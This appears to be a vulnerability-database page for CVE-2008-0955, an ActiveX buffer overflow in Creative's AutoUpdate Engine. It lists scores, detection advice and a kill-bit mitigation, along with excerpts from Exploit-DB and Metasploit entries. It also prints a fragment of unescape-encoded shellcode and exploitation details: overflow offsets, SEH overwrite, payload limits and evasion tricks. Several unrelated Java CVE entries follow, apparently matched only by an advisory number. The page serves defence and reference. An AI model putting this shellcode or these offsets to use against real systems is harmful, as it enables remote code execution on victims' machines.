CVE-2008-0955
published 2008-05-29CVE-2008-0955: Stack-based buffer overflow in the Creative Software AutoUpdate Engine ActiveX control in CTSUEng.ocx allows remote attackers to execute arbitrary code via a…
PriorityP356critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
41.23%
98.5th percentile
Stack-based buffer overflow in the Creative Software AutoUpdate Engine ActiveX control in CTSUEng.ocx allows remote attackers to execute arbitrary code via a long CacheFolder property value.
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%u9090%u9090%ue8fcD%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a%u685f%ufe98%u0e8a%uff57%u63e7%u6c61c
- →The CacheFolder property of CTSUEng.ocx triggers a stack-based buffer overflow after 260 bytes; at 512 bytes it overwrites SEH and allows reliable code execution. Monitor for unusually long string values set on this ActiveX property. ↗
- →Set the kill bit for ActiveX CLSID 0A5FD7C5-A45C-49FC-ADB5-9952547D5715 (CTSUEng.ocx) to prevent instantiation in Internet Explorer. ↗
- →Exploit delivers a heap spray using the %u0c0c%u0c0c pattern combined with NOP sleds and shellcode via JavaScript unescape(). Detect this pattern in HTML/JS content delivered to IE clients. ↗
- →The Metasploit module targets Windows XP SP0-SP3 and Windows Vista with IE 6.0 SP0-SP2 and IE 7. Payload space is 1024 bytes with null byte as bad character. ↗
- →The exploit uses randomized JavaScript variable names to evade static signature detection; focus on behavioral detection of large string assignments to the CacheFolder property of the CTSUEng.ocx ActiveX object. ↗
- ·The Metasploit module sets EXITFUNC to 'process', meaning the exploit terminates the browser process on exit rather than cleanly returning; this may affect post-exploitation stability. ↗
- ·Payload space is limited to 1024 bytes and null bytes (\x00) are bad characters; staged or larger payloads must account for these constraints. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-0955 Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)
Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: creative_software_cachefolder.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When
sending an overly long string to the cachefolder() property of CTSUEng.ocx
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE
Exploit-DB
Creative Software AutoUpdate Engine - ActiveX Stack Overflow
exploitdb·2008-05-27
CVE-2008-0955 Creative Software AutoUpdate Engine - ActiveX Stack Overflow
Creative Software AutoUpdate Engine - ActiveX Stack Overflow
---
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
CacheFolder property is vulnerable to stack-based buffer overflow after 260 bytes, @ 512 bytes overwrites SEH and allows code execution reliably.
Original Advisory @ http://www.kb.cert.org/vuls/id/501843 and Vulnerability Discovered by Greg Linares of eEye Digital Security
ActiveX Download @ http://www.creative.com/su/Product.asp
MAXIMUM RESPECT TO RGOD (RIP) - A TRUE INSPIRATION
Greetz to KCOPE, ELAZAR, H07, MATTEO, SHINNAI, AURIEMMA and to all the 2008 .CN/.RU/.JP/.* SQL INJECTORS - HAVE FUN WITH THIS YOU BASTARDS!
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Tested On Windows XP SP3 with all patches (like that matters)
Products Af
Metasploit
Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow
metasploit
Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow
Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When sending an overly long string to the cachefolder() property of CTSUEng.ocx an attacker may be able to execute arbitrary code.
Bugzilla
CVE-2008-3104 Java RE allows Same Origin Policy to be Bypassed (6687932)
bugzilla·2008-07-09·CVSS 6.8
CVE-2008-3104 [MEDIUM] CVE-2008-3104 Java RE allows Same Origin Policy to be Bypassed (6687932)
CVE-2008-3104 Java RE allows Same Origin Policy to be Bypassed (6687932)
Security vulnerabilities in the Java Runtime Environment may allow an untrusted
applet that is loaded from a remote system to circumvent network access
restrictions and establish socket connections to certain services running on the
local host, as if it were loaded from the system that the applet is running on.
This may allow the untrusted remote applet the ability to exploit any security
vulnerabilities existing in the services it has connected to.
Discussion:
This was resolved via:
http://rhn.redhat.com/errata/RHSA-2008-0595.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0955.html (RHEL3, RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0790.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2
Bugzilla
CVE-2008-3112 Java Web Start, arbitrary file creation (6703909)
bugzilla·2008-07-09·CVSS 10.0
CVE-2008-3112 [CRITICAL] CVE-2008-3112 Java Web Start, arbitrary file creation (6703909)
CVE-2008-3112 Java Web Start, arbitrary file creation (6703909)
Sunalert, 238905, Second Issue
A vulnerability in Java Web Start may allow an untrusted Java Web Start
application downloaded from a website to create arbitrary files with the
permissions of the user running the untrusted Java Web Start application.
Discussion:
This was resolved via:
http://rhn.redhat.com/errata/RHSA-2008-0595.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0955.html (RHEL3, RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0790.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0636.html (Satellite 5.1)
http://rhn.redhat.com/errata/RHSA-2008-0638.html (Satellite 5.1)
http://rhn.redhat.com/errata/RHSA-2008-0906.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0594.html (RHE
Bugzilla
CVE-2008-3113 Java Web Start arbitrary file creation/deletion file with user permissions (6704077)
bugzilla·2008-07-09·CVSS 10.0
CVE-2008-3113 [CRITICAL] CVE-2008-3113 Java Web Start arbitrary file creation/deletion file with user permissions (6704077)
CVE-2008-3113 Java Web Start arbitrary file creation/deletion file with user permissions (6704077)
Sunalert, 238905, Third Issue
A vulnerability in Java Web Start may allow an untrusted Java Web Start
application downloaded from a website to create or delete arbitrary files with
the permissions of the user running the untrusted Java Web Start application.
Discussion:
This was resolved via:
http://rhn.redhat.com/errata/RHSA-2008-0595.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0955.html (RHEL3, RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0790.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0636.html (Satellite 5.1)
http://rhn.redhat.com/errata/RHSA-2008-0638.html (Satellite 5.1)
Bugzilla
CVE-2008-3114 Java Web Start, untrusted application may determine Cache Location (6704074)
bugzilla·2008-07-09·CVSS 5.0
CVE-2008-3114 [MEDIUM] CVE-2008-3114 Java Web Start, untrusted application may determine Cache Location (6704074)
CVE-2008-3114 Java Web Start, untrusted application may determine Cache Location (6704074)
Sunalert, 238905, Fourth Issue
A vulnerability in Java Web Start may allow an untrusted Java Web Start
application to determine the location of the Java Web Start cache.
Discussion:
This was resolved via:
http://rhn.redhat.com/errata/RHSA-2008-0595.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0955.html (RHEL3, RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0790.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0636.html (Satellite 5.1)
http://rhn.redhat.com/errata/RHSA-2008-0638.html (Satellite 5.1)
http://rhn.redhat.com/errata/RHSA-2008-0906.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0594.html (RHEL4, RHEL5)
http://secunia.com/advisories/30403http://www.kb.cert.org/vuls/id/501843http://www.securityfocus.com/bid/29391http://www.vupen.com/english/advisories/2008/1668https://exchange.xforce.ibmcloud.com/vulnerabilities/42673https://www.exploit-db.com/exploits/5681http://secunia.com/advisories/30403http://www.kb.cert.org/vuls/id/501843http://www.securityfocus.com/bid/29391http://www.vupen.com/english/advisories/2008/1668https://exchange.xforce.ibmcloud.com/vulnerabilities/42673https://www.exploit-db.com/exploits/5681
2008-05-29
Published